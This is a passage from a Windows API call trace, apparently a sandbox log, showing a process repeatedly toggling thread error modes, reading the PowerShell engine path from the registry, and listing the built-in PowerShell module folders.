lpOldMode=0xafa508e130) returned 1 [0198.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.747] CoTaskMemAlloc (cb=0x20e) returned 0x2386d703cc0 [0198.747] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2386d703cc0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0198.748] CoTaskMemFree (pv=0x2386d703cc0) [0198.748] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508e0f8 | out: phkResult=0xafa508e0f8*=0x710) returned 0x0 [0198.748] RegQueryValueExW (in: hKey=0x710, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508e148, lpData=0x0, lpcbData=0xafa508e140*=0x0 | out: lpType=0xafa508e148*=0x1, lpData=0x0, lpcbData=0xafa508e140*=0x56) returned 0x0 [0198.748] RegQueryValueExW (in: hKey=0x710, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508e148, lpData=0x23800639360, lpcbData=0xafa508e140*=0x56 | out: lpType=0xafa508e148*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508e140*=0x56) returned 0x0 [0198.748] RegCloseKey (hKey=0x710) returned 0x0 [0198.748] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xafa508dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0198.758] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xafa508dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0198.758] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xafa508e1f0 | out: lpFileInformation=0xafa508e1f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0198.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xafa508dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0198.759] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xafa508e1f0 | out: lpFileInformation=0xafa508e1f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0198.759] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0198.759] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d70a010 [0198.760] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.760] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0198.760] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0198.760] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0198.761] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0198.761] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0198.763] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0198.763] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0198.764] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0198.764] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0198.764] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0198.764] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0198.764] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0198.764] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0198.765] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0198.765] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0198.765] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0198.765] FindNextFileW (in: hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 